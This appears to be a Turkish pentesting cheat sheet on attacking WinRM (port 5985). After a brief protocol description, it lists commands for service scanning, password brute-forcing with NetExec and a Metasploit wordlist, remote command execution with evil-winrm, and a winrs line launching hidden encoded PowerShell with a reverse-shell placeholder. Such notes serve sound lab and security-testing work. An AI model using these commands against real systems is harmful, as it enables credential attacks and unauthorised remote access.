WinRM - 5985

Winrm Nedir?

• WinRM (Windows Remote Management), Windows işletim sistemlerinde uzaktan yönetim görevlerini gerçekleştirmek için kullanılan bir protokoldür.

• Sistem yöneticilerinin uzaktaki Windows makinelerinde komutlar çalıştırmasını, yapılandırma değişiklikleri yapmasını ve sistem bilgilerini toplamasını sağlar.

Genel Bilgiler

nmap -sV -sC -p5985,5986 --disable-arp-ping -n 10.129.201.248

Brute Force

nxc winrm 192.168.1.2 -u john -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Komut Çalıştırma

nxc winrm 192.168.1.2 -u john -p pass123 -x "whoami"
evil-winrm -u john -p 'pass123' -i 192.168.1.2
winrs -r:192.168.246.72 -u:john -p:pass123 "powershell -nop -w hidden -e base64_rev"